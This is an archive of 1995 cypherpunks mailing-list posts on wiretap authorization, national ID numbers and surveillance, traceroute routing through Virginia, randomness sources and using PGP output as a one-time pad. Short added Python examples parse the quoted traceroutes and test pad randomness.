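        "random_real_ok": xor(ct_random, true_pad) == MESSAGE,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

With a realistic key size the search is infeasible rather than instant, but the ciphertext is still explained only by pads the algorithm can produce, which is why the result is a cipher and not a one time pad.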




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 5 Nov 1995 13:52:53 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Telephone switch capacity -Reply
In-Reply-To: <v02120d02acc1d4859dfc@[192.0.2.1]>
Message-ID: <Pine.SOL.3.91.951105003800.21655A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 4 Nov 1995, Lucky Green wrote:

> At 18:43 11/3/95, Rich Graves wrote:
> >[about the FBI supposedly wanting the ability to tap 1% of all phones in
> >the US simultaneously]
> 
> [...]
> >Of course the FBI doesn't have the staff to listen to all these lines, and
> >they need an individual court order to authorize each individual
> >interception, so this numbers game is a bit of a joke.
> 
> One more time. Despite what you read in the papers, despite what most
> people - even in the legal profession - believe, telephone wiretaps do
> _not_ require a court order. They haven't required a court order in over a
> year. The Digital Telephony Bill, which passed Congress by an overwhelming
> margin, _explicitly_ allows for wiretap authorizations other than a court
> order. The law does not impose any rules for these "other forms of
> authorization".
> 
> "The captain signed it off" may suffice.


And Clinton issued an executive order allowing Janet Reno (or her 
designees, I believe) to approve wiretaps.

bd


> 
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 5 Nov 1995 14:37:56 +0800
To: cypherpunks@toad.com
Subject: [NOISE, if interesting NOISE] Assassins
Message-ID: <Pine.SUN.3.91.951105012822.9937A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Interested parties might want to discuss the effectiveness of murder in 
politics with the world's most recent assassin.

Or at least leave interesting mail to the security forces who will likely 
be running through his e-mail.

Here's your chance to make your life REAL interesting, and test PGP, just 
send some encrypted mail to our friend and gunman Mr. Amir at:

la59@popeye.cc.biu.ac.il


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 16:24:59 +0800
To: Mats Bergstrom <cypherpunks@toad.com
Subject: Re: Credentials Without Identity
Message-ID: <acc1ae3828021004292e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I do not intend my comments below to be disrespectful to the people of Sweden.

At 4:32 AM 11/5/95, Mats Bergstrom wrote:

>Ah, the Swedish way is so much more convenient. Directly after birth you
>get a tag around your arm, with a number that is later changed to an
>entry into several databases, including 'Birth Registry' and you get
>your Person Number for life, in the format YYMMDD-abcd, which is
>unique (at least in Sweden). All forthcoming database entries are based
>on this number, usually as a first key field. Surprise immigrants get a

The Swedish way may be more convenient, but the Nazi way was even more
convenient. The Person Numbers (or NonPerson Numbers, I suppose) were
tattooed directly on the arms.

For many of us, the essence of strong crypto, crypto anarchy, and the
Cypherpunks list is to avoid this "Swedish future." Truly a blight on
mankind, if you ask me.

The U.S is moving swiftly in this direction. (Ironically, the foreign press
clucks at our "fascism" with Proposition 187-type measures, while their own
countries are far more restrictive in allowing immigration.)

Fortunately, I have heard there is a "right wing" backlash growing in some
of the Scandinavian countries, especially Norway and Denmark. ("Right wing"
is what the press calls it...I hope it's really "anti-left wing,"
anti-cradle-to-grave-socialism.)


>other person). Most Government databases are open to the public, so
>the credit tracking agencies don't have to work very hard regarding

The worst of both worlds: the government mandates that information be
collected at every turn, then opens the records for all to see.

>Now, there are laws against cross-referencing various databases
>without the approval of the Data Inspection, which often says no.

To my surprise, several people on this list have expressed support for the
need for so-called "data privacy laws." I look at it this way: if I put
things on my computer based on things I have learned, or even compile lists
of people and places, etc., who can enter my home and demand that I expunge
these records? The problem with well-intentioned laws about data privacy is
that they impinge directly on the freedom to read and write, to make lists,
to enter thoughts into computers, etc. (I'm sure the _intent_ is to go
after MasterCard-type operations and inaccurate records, but businesses in
Britain are already facing investigation for having computerized mailing
lists. Ironically, the Cypherpunks mailing list might be illegal in the
U.K. unless the legal forms were properly filled out, the fees paid, the
parties notified on a regular basis of information about them, etc. And our
archiving of posts is ipso facto illegal under several interpretations of
the Data Privacy laws of some countries unless extensive notifications are
made and permissions received. The Data Privacy laws make us all criminals
for storing received messages in data bases.)

More practically, giving a government the power to say which data bases are
acceptable, and which data bases are illegal, is a terrible thing. Besides
the opportunities for abuse (by a Stalin, a Nixon, a Pol Pot, a Clinton),
it is also an impractical law to enforce, as Mats' next point makes:

>But if you do it illegally, there is very little risk of detection.
>It looks like the Approved ID will be a smart-card with a signing
>mechanism (probably escrowed), naturally linked to the Person Number,
>real soon now, at least before the mythical y.2000 . Links to physical
>characteristics (retina?) are not (openly) discussed yet but may
>eventually come into play.
...

And:

>2) Prepare for Crypto Anarchy. Create untrackable net aliases for
>   future use. Keep informed of all the tricks to bypass coming
>   futile attempts to link net pseudonyms to Person Numbers (or
>   physical characteristics). Enjoy (and help create and protect)
>   the virtual sanctuary with digital mixes and anonymous http
>   proxies (and DC-nets or something better eventually).

Sad, isn't it, that the world is rushing headlong into an Orwellian future.
"Disneyland with a death penalty" ("Wired"--S. Sandfort, W. Gibson).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Huddleston <reh@wam.umd.edu>
Date: Sun, 5 Nov 1995 15:05:10 +0800
To: nobody@REPLAY.COM
Subject: Re: lp (134.222.35.2)?
Message-ID: <199511050655.BAA18760@exp1.wam.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


134.222.0.0 is a Class B network, so if you do 'whois' on 134.222.0.0
(instead of the individual IP addresses) you find:

European Unix Users Group (NET-EUNET-X25)
   Kruislaan 413
   NL-1098 SJ Amsterdam
   NETHERLANDS

   Netname: EUNET-X25
   Netnumber: 134.222.0.0

   Coordinator:
      EUnet Ltd  (EU-NIC)  hostmaster@nic.eu.net
      +31 20 5925109
      +31 20 5925165 (24hr Emergency)
      +31 20 5925163 (fax)

   Domain System inverse mapping provided by:

   NS.EU.NET			192.16.202.11
   SUNIC.SUNET.SE		192.36.125.2 192.36.148.18
   NS.UU.NET			137.39.1.3
   NS2.NIC.FR			192.93.0.4

   Record last updated on 07-Mar-94.

...what does this do to your traceroute dumps?

Richard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Sun, 5 Nov 1995 16:22:53 +0800
To: discuss_ds@c2.org
Subject: My Sympathies to you at this time.
Message-ID: <199511050813.BAA08529@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


To those of you from Israel or who are Jewish,
my deepest sympathies to all of you.

Love Always,

Carol Anne

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pat Billings <pat@falcon.inetw.net>
Date: Sun, 5 Nov 1995 16:53:19 +0800
To: Censored Girls Anonymous <carolann@censored.org>
Subject: Re: My Sympathies to you at this time.
In-Reply-To: <199511050813.BAA08529@usr2.primenet.com>
Message-ID: <Pine.3.89.9511050329.A11923-0100000@falcon.inetw.net>
MIME-Version: 1.0
Content-Type: text/plain


We are *all* stunned at this senseless loss....even those of us who do 
not live in Israel or are not Jewish.....   This is a great loss.

Love,

SuprSmile

On Sun, 5 Nov 1995, Censored Girls Anonymous wrote:

> To those of you from Israel or who are Jewish,
> my deepest sympathies to all of you.
> 
> Love Always,
> 
> Carol Anne
> 
> --
> 
> Member Internet Society  - Certified BETSI Programmer  -  Webmistress
> ***********************************************************************
> Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
> My Homepage
> The Cyberdoc
> ***********************************************************************
> ------------------ PGP.ZIP Part [017/713] -------------------
> M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
> MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
> MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
> -------------------------------------------------------------
> for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 5 Nov 1995 18:23:05 +0800
To: cypherpunks@toad.com
Subject: [noise, personal reply] CBC address.
In-Reply-To: <199511050721.XAA14000@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511050521.A29690-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 4 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> Does anyone on this list know if the CBC has a web site on the Net?
<www.cbc.ca>  They have a lot of shows in .au (so I hear) or accessible by 
realaudio. Don't know if they have any mpigs [sic] though. There's an alt 
newsgroup too.
You oughta use Sameer's (or someone else's) replyable remailer when asking 
questions Alice.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sun, 5 Nov 1995 12:43:55 +0800
To: cypherpunks@toad.com
Subject: Re: Credentials Without Identity
In-Reply-To: <acc154b62202100420bc@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.951105034513.1465A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Timothy C. May wrote:

> The credit tracking agencies can do this trivially, with names, social
> security numbers, driver's license numbers, addresses, phone numbers, etc.
> All are pointers into the cloud of numbers that constitutes one's dossier.

Ah, the Swedish way is so much more convenient. Directly after birth you
get a tag around your arm, with a number that is later changed to an
entry into several databases, including 'Birth Registry' and you get
your Person Number for life, in the format YYMMDD-abcd, which is
unique (at least in Sweden). All forthcoming database entries are based
on this number, usually as a first key field. Surprise immigrants get a
preliminary number at the border (other format) and a genuine one if
later accepted. Without a Person Number you would be practically
helpless: no schooling, no drivers licence, no 'social benefits',
no bank account, no job (if your employer intends to do it legally
and cut off taxes). The only marginally possible way to get around
this is to use the Person Number of another person (forging a Swedish
Approved ID is quite a task, though, and it's not very kind to that
other person). Most Government databases are open to the public, so
the credit tracking agencies don't have to work very hard regarding
persons (sometimes a bit more with corporate entities; those can be
registered to fall guys - not hard to find in a jurisdiction with
nice jails and short sentences). 

Now, there are laws against cross-referencing various databases
without the approval of the Data Inspection, which often says no.
But if you do it illegally, there is very little risk of detection.
It looks like the Approved ID will be a smart-card with a signing
mechanism (probably escrowed), naturally linked to the Person Number,
real soon now, at least before the mythical y.2000 . Links to physical
characteristics (retina?) are not (openly) discussed yet but may
eventually come into play.

I think there's not much to win (and a lot of conveniency to lose)
in trying to hide from this System. A friend of mine, and his wife,
had their baby born at home and hid it from the System for several
years (losing good money from the Social Security system in that
process - in Sweden all people get many 'benefits'= transferred tax
money, regardless of income) but eventually they registered the child,
of course. It was a mere gesture.

Solution:

1) Don't fight the inevitable, like Don Quixote (sp?) did. The
   trick is to keep one's database entries as unsuspicious as
   possible. Pay politically correct items and services with
   a credit card, but use cash in transfers that the current
   (and possibly a coming, more Orwellian) regime might consider
   to be disloyal. Don't refuse to fill in forms or answer
   questions which are more or less obligatory or that might give
   you some benefits - just lie if necessary to create a normal,
   inconspicuous profile.

2) Prepare for Crypto Anarchy. Create untrackable net aliases for
   future use. Keep informed of all the tricks to bypass coming
   futile attempts to link net pseudonyms to Person Numbers (or
   physical characteristics). Enjoy (and help create and protect)
   the virtual sanctuary with digital mixes and anonymous http
   proxies (and DC-nets or something better eventually).

Mats
   
   









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 5 Nov 1995 20:13:30 +0800
To: hua@xenon.chromatic.com (Ernest Hua)
Subject: Re: lp (134.222.35.2)?
In-Reply-To: <199511050653.WAA17662@xenon.chromatic.com>
Message-ID: <9511051204.AA10691@all.net>
MIME-Version: 1.0
Content-Type: text


...
> It would be fun (perhaps horrible) to see what the NSA does the first
> time Israel or France set up their own high capacity long distance to
> other friendly/unfriendly countries (thus bypassing the US completely).
> Second, let France or some other country set up major Internet routing
> clearinghouses which advertise secure routes to other nations (not US).

I hope nobody would believe that either France or Israel would provide
secure communications.  France has a global reputation for industrial
espionage, and Israel almost certainly listens to all the traffic it
can.  That's probably true of most industrialized nations in today's world.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 5 Nov 1995 14:27:17 +0800
To: cypherpunks@toad.com
Subject: lp (134.222.35.2)?
Message-ID: <199511050620.HAA14046@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I'm sure some of you will have seen this, so sorry to toss logs on the
listburn fire; still, it seemed worth reposting to CP--no, it's not
entirely crypto-related, but nor is it a completely vague allegation.

>From GovAccess.183.snoops:

>  The following is the transcript of an actual communications trace that a
>  friend ran, while I was sitting next to him, watching -- reprinted here
>  with his permission.
>  
>  He did a "traceroute" of two messages that he sent from his machine in
>  Switzerland (he'd telneted into it while we were at a computer conference
>  in California).
>  
>  Traceroute automatically reports each Internet node through which a message
>  passes, as it proceeds from origin to destination.
>  
>  He did two traceroutes.  The first was from Switzerland to an addressee at
>  Netcom in San Jose, California.  The second was from Switzerland to an
>  addressee in Israel.
>  
>  
>  Date: Fri, 21 Apr 95 02:54:58 +0200
>  From: kelvin@fourmilab.ch (John Walker)
>  To: jwarren@well.com
>  Subject: Traceroute
>  
>  > /usr2/kelvin> traceroute netcom11.netcom.com
>  traceroute to netcom11.netcom.com (192.100.81.121), 30 hops max, 40
>  byte packets
>   1  eunet-router (193.8.230.64)  2 ms  2 ms  2 ms
>   2  146.228.231.1 (146.228.231.1)  326 ms  345 ms  307 ms
>   3  Bern5.CH.EU.NET (146.228.14.5)  447 ms  408 ms  364 ms
>   4  146.228.107.1 (146.228.107.1)  127 ms  37 ms  36 ms
>   5  Zuerich1.CH.EU.NET (146.228.10.80)  37 ms  38 ms  175 ms
>   6   (134.222.9.1)  65 ms  109 ms  252 ms
>   7  lp (134.222.35.2)  196 ms  179 ms  405 ms
>   8  Vienna1.VA.ALTER.NET (137.39.11.1)  191 ms  179 ms  313 ms
>   9  fddi.mae-east.netcom.net (192.41.177.210)  336 ms  204 ms  303 ms
>  10  t3-2.dc-gw4-2.netcom.net (163.179.220.181)  182 ms  251 ms  187 ms
>  11  t3-2.chw-il-gw1.netcom.net (163.179.220.186)  305 ms  586 ms  518 ms
>  12  t3-2.scl-gw1.netcom.net (163.179.220.190)  537 ms  693 ms  797 ms
>  13  t3-1.netcomgw.netcom.net (163.179.220.193)  698 ms  549 ms  754 ms
>  14  netcom11.netcom.com (192.100.81.121)  890 ms  1922 ms  1696 ms
>  
>  > /usr2/kelvin> traceroute jerusalem1.datasrv.co.il
>  traceroute to jerusalem1.datasrv.co.il (192.114.21.101), 30 hops max, 40
>  byte packets
>   1  eunet-router (193.8.230.64)  2 ms  3 ms  2 ms
>   2  146.228.231.1 (146.228.231.1)  933 ms  853 ms  874 ms
>   3  Bern5.CH.EU.NET (146.228.14.5)  1040 ms  450 ms  525 ms
>   4  146.228.107.1 (146.228.107.1)  453 ms  424 ms  188 ms
>   5  Zuerich1.CH.EU.NET (146.228.10.80)  64 ms  61 ms  47 ms
>   6   (134.222.9.1)  80 ms  312 ms  84 ms
>   7  lp (134.222.35.2)  270 ms  400 ms  216 ms
>   8  Vienna2.VA.ALTER.NET (137.39.11.2)  660 ms  1509 ms  886 ms
>   9  dataserv-gw.ALTER.NET (137.39.155.38)  1829 ms  1094 ms  1306 ms
>  10  orion.datasrv.co.il (192.114.20.22)  1756 ms  1280 ms  1309 ms
>  11  ...
>  
>  
>  Notice that both messages went through an unnamed site -- 134.222.9.1 and
>  then a strangely-named site, "lp (134.222.35.2)" -- then through the same
>  Vienna, Virginia (USA) site ... and thereafter, on to their destination.
>  I.e., the second message went through Virginia to get from Switzerland to
>  Israel.
>  
>  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
>  report, ``No match for "134.222.9.1". '' and `` No match for
>  "134.222.35.2".''
>  
>  Now let me see ... which spy agencies are located in or near Virginia?
>  
>  --jim
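
Added example (not part of the quoted GovAccess item or of any reply): the lookup described in Richard Huddleston's reply in this thread, deriving the classful network address to give to whois instead of the host address, applied to hops 5-9 of the two traces quoted above. The function names are hypothetical; the hop lines are copied from the quoted traces.

```python
import ipaddress
import re
from collections import namedtuple

Hop = namedtuple("Hop", "ttl name ip rtts_ms")

# Hops 5-9 of each trace as quoted in the post, mail quote prefix included.
TRACE_NETCOM = """\
>  traceroute to netcom11.netcom.com (192.100.81.121), 30 hops max, 40
>  byte packets
>   5  Zuerich1.CH.EU.NET (146.228.10.80)  37 ms  38 ms  175 ms
>   6   (134.222.9.1)  65 ms  109 ms  252 ms
>   7  lp (134.222.35.2)  196 ms  179 ms  405 ms
>   8  Vienna1.VA.ALTER.NET (137.39.11.1)  191 ms  179 ms  313 ms
>   9  fddi.mae-east.netcom.net (192.41.177.210)  336 ms  204 ms  303 ms
"""

TRACE_ISRAEL = """\
>  traceroute to jerusalem1.datasrv.co.il (192.114.21.101), 30 hops max, 40
>  byte packets
>   5  Zuerich1.CH.EU.NET (146.228.10.80)  64 ms  61 ms  47 ms
>   6   (134.222.9.1)  80 ms  312 ms  84 ms
>   7  lp (134.222.35.2)  270 ms  400 ms  216 ms
>   8  Vienna2.VA.ALTER.NET (137.39.11.2)  660 ms  1509 ms  886 ms
>   9  dataserv-gw.ALTER.NET (137.39.155.38)  1829 ms  1094 ms  1306 ms
>  11  ...
"""

# Optional quote prefix, hop number, optional host name, address, timings.
HOP_RE = re.compile(
    r"^[>\s]*(\d+)\s+([^\s(]*)\s*\((\d{1,3}(?:\.\d{1,3}){3})\)(.*)$"
)


def parse_trace(text):
    """Return the hop lines of a traceroute listing; header lines, wrapped
    lines and truncated hops ("11  ...") are skipped."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue
        ttl, name, ip, rest = m.groups()
        rtts = [int(v) for v in re.findall(r"(\d+) ms", rest)]
        hops.append(Hop(int(ttl), name, ip, rtts))
    return hops


def classful_network(ip):
    """Class letter and network address under the classful rules the reply
    relies on (first octet <128: A /8, <192: B /16, <224: C /24)."""
    first = int(ip.split(".")[0])
    if first < 128:
        cls, prefix = "A", 8
    elif first < 192:
        cls, prefix = "B", 16
    elif first < 224:
        cls, prefix = "C", 24
    else:
        raise ValueError(f"{ip} is class D/E and has no network portion")
    net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
    return cls, str(net.network_address)


def shared_hops(a, b):
    """Hops of trace `a` whose address also appears in trace `b`."""
    in_b = {h.ip for h in b}
    return [h for h in a if h.ip in in_b]


def whois_targets(hops):
    """Ordered, de-duplicated network addresses to query for these hops."""
    targets = []
    for h in hops:
        net = classful_network(h.ip)[1]
        if net not in targets:
            targets.append(net)
    return targets


if __name__ == "__main__":
    common = shared_hops(parse_trace(TRACE_NETCOM), parse_trace(TRACE_ISRAEL))
    for h in common:
        print(h.ttl, h.name or "(no name)", h.ip, classful_network(h.ip))
    print("whois on:", whois_targets(common))
```

The classful boundaries fit this 1995 allocation; for addresses assigned under CIDR, the block the registry returns is the one to read.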




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Shantz <bshantz@nwlink.com>
Date: Mon, 6 Nov 1995 01:08:48 +0800
To: cypherpunks@toad.com
Subject: Tim, Perry, it's gettin' real old.
Message-ID: <9511051657.AA22854@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May, Perry Metzger, on the topic of off topic things, I think this
little flame war of yours can be taken offline.  It's getting real old
watching two grown men fling mud at each other.  That's why I don't watch
Presidential debates anymore.  (Although I did enjoy Admiral Stockdale
turning off his hearing aid when Quayle and Gore were bitching at each other.)

This is the last I'll say on the subject.

The wonders of freedom allow me to delete any threads I don't want to read.
And I exercise that right frequently.

Grow up, boys.

Brad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 5 Nov 1995 22:58:37 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Video as a source of randomness
In-Reply-To: <199511042352.PAA07530@ix4.ix.netcom.com>
Message-ID: <95Nov5.095208edt.917@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


The cheapest strong source of video noise that I can think of would be
a small fan with a ribbon tied to the grille.  As long as it's in a
turbulent flow regime, you'll get very random numbers at a fast
rate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 6 Nov 1995 02:01:20 +0800
To: cypherpunks@toad.com
Subject: "The Policeman Inside"
Message-ID: <acc2319202021004e8ac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:35 PM 11/5/95, Mats Bergstrom wrote:

>Well, also in Sweden, but this is merely against tax money transferred to
>the 'less fortunate' (or 'lazy', as you sometimes call them) and is very
>little, if at all, connected to anti-surveillance. Cross-referencing
>various databases would actually be good for catching those who receive,
>for example, unemployment money while actually working full time (especially
>common amongst Mediterranean and Middle East 'political' refugees - many
>of whom like to come here and work for a handful of years, sometimes adding
>a decade to their actual age so they can go home to a warm climate at 55
>to live as kings on their Swedish pensions). Isn't this a dilemma, also at
>your home turf? FINCEN efficiency might save some of your tax dollars.
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Mats' point is an important issue to think about. The "conservative" who
wants to get the bums off welfare and keep his hard-earned kroners or
francs may embrace a FinCEN-type computerized police state. In a system of
extensive transfer payments, such "person number" tracking is needed to
ensure that Citizen Units do not make double claims, do not retire before
they have made their full productive contribution to the welfare of the
herd, and so on.

A "libertarian" would argue that when economic interactions are uncoerced,
when there are few if any lay-abouts collecting food stamps, welfare, AFDC,
WICC, generous pensions paid by taxpayers, etc., then the "need" for
Citizen Unit identification vanishes.

This actually has some crypto relevance, besides the obvious crypto anarchy
connections. Namely, parallels with "offline" and "online" clearing.

A system in which pieces of paper and various promissory notes are
transferred around as money, with later (offline) clearing, tends to
require True Names. This so that defaulting parties can be tracked down and
collected from. (And of course there are also tax issues, and regulatory
issues, but I'm concentrating on the offline or deferred clearing issues
that tend to make True Names and physical identities more important.)

By contrast, a cash economy--online or immediate clearing--tends to not
require identification. "Cash and carry," which has worked for millennia in
diverse cultures which have no forms of identification. One pays in corn,
or beads, or gold, and that's that.  (There are, as Futplex noted I like to
say, "lots of issues." We could discuss exceptions to this, such as
contracts, age credentials, etc. But, generally, cash transactions tend to
produce no compelling need for identification. This is the norm in most
retail transactions, unless "checks" or other forms of deferred clearing
payment are tendered.)

The modern "identity state" is becoming consumed with the notion that
everyone needs an index number. Not necessarily because the police want to
compile dossiers on them (though this is a factor), but because of the
focus on rules and regulations which affect _monetary flows based on
identity_.

In the U.S. for example, one used to just be able to pay someone to cut
one's lawn in cash (or check, if he trusted you, blah blah) or babysit
one's children. Now, under new crackdowns on social security laws, income
tax estimated payment laws, hiring of undocumented workers laws, etc., this
is technically no longer possible. One must, above some tiny threshold of
payments, file various tax and social security forms, and take steps to
ensure the worker is properly documented (*)

(* Most white people in America have little "proof" that they are proper
Citizen Units. This leads to uncomfortable situations where only brown- and
yellow-skinned persons are asked to prove their identities and their
Citizen Unit or Resident Unit status.)

There is strong pressure on several fronts to establish a "National
Identification Card." Others are opposed.

My point, originally, to Rich Graves' mention of Chris Hibbert's excellent
FAQ on Social Security Numbers and person numbers, is that it is no longer
relevant to fight against a "single index number." Modern data base methods
are so well-suited to cross-indexing that it hardly matters whether there's
a single point of entry to the data base or not.

THE KEY POINT IS THIS: Are voluntary economic transactions between persons
to be subject to approval and regulation by the State? If babysitting and
lawnmowing, not to mention hiring someone to write some C code, requires
submitting tax and Social Security forms, requires checking the J-1 vs.
Permanent Resident vs. Approved Citizen Unit status, then the die is cast.

Ordinarily, or in earlier years, these rules might have been dismissed as
trivial or as mostly ignorable. After all, so long as one is not planning
to become Attorney General, who cares whether a housekeeper was "legal" or
not? Who cares whether the detailed Social Security, IRS, and Immigration
Control forms were filled out properly, or at all?

Well, the State is becoming more efficient in tracking such things, and tax
penalties are increasing. Further, bounties are being paid to those who
inform on "tax cheats." Computerized records are being used to spot those
with "apparent incomes" (= lifestyles) inconsistent with their tax filing
status.

Sure, part of this is to catch "double dippers," such as those collecting
unemployment, welfare, AFDC, disability benefits while also doing work on
the side. (There's a whole issue here of the laws about welfare recipients
not being allowed to work, which I won't get into.)

But the danger, and something that should inform our Cypherpunks
discussions, is that these laws which are tied to one's status as a Person
Unit in the system, inevitably require an extensive "identity tracking"
regimen.

The libertarian and anarcho-capitalist solution is not to increase the
power of the surveillance state to detect fraud and non-compliance, but to
roll things back to a more even keel.

Even if one believes taxes are "the price paid for civilization," there are
superior alternatives to the current system. (My current favorite is:
mandatory slavery for X days per year, regardless of age or ability.
Instead of taxes, everyone works one day in five, or 2 months out of the
year, etc., for the herd. Building roads, picking up trash, administering
computers, etc. There are "lots of issues," but even I agree this list is
not the best place to discuss it; I mention it in passing.)

In closing, we must beware "the policeman inside," to use the William
Burroughs term. A surveillance state that arises because modern computers
and data bases allow all economic transactions to be monitored, taxed, and
approved or disapproved is a horror we should fight with all of our
resources. Whether right-, left-, or libertarian-leaning, the implications
of this state power to control our lives are horrible.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Sat, 4 Nov 1995 23:06:29 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: using pgp to make an otp
Message-ID: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

greetings c-punks,

i may have posted this at some time in the past, as i have asked it
elsewhere and gotten different responses. i'm interested in what the
folx here think about it though, so here it is...

i want a source of data for use as a otp. i don't want to have to
hook up any external devices to my pc to do it. (although some of the
methods mentioned in the past few days are quite interesting.) 

i'd like to know if there was a reason not to use the output of pgp
to do it. i've been playing with the following method. i take a file
and encrypt it to a key with the '-a' flag on. this generates an
ascii file that is easily editable using simple, standard rexx calls.
i strip the first 20 or so lines and the last 20 or so lines
and put the resulting file aside. then i perform the same operation
again and append the file to the previous result. i repeat until the
file is sufficiently large for my purposes and then give the
resulting file to the person(s) i want to have it. 

i still need a program to make use of the otp i've produced, but
haven't gotten that far as this is still pretty much a thought
experiment and something for me to waste time with. once i'm ready to
make use of it i'll either find a program or attempt to write
something to use to make the data i've generated useful.

i would think that the output of pgp should be pretty darn random. if
it isn't, then its usefulness is less than its reputation imo. as
you can tell if you've read this far, i'm not a cryptographer. i just
like the stuff and am working to become more proficient in its use as
i think it is important if we are to maintain our privacy in an
increasingly digital world.

what are the holes in this? why would it be unadvisable to do it?
otoh, would it be a good basis for a otp?

amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
PGP Key = 4A2683C1
November 5, 1995   1:16
 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
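
One measurable hole in the scheme described in this message, shown as an added example (not part of the original post): radix-64 armor uses only 64 symbols, so each pad byte carries at most 6 bits, and XORing it with text narrows every plaintext byte to at most 64 values. The armor here is a constructed stand-in built from SHA-256 output, not real PGP output, and all function names are this example's own.

```python
import base64
import hashlib
import math
from collections import Counter

# The 64 symbols that radix-64 (base64) armor is built from.
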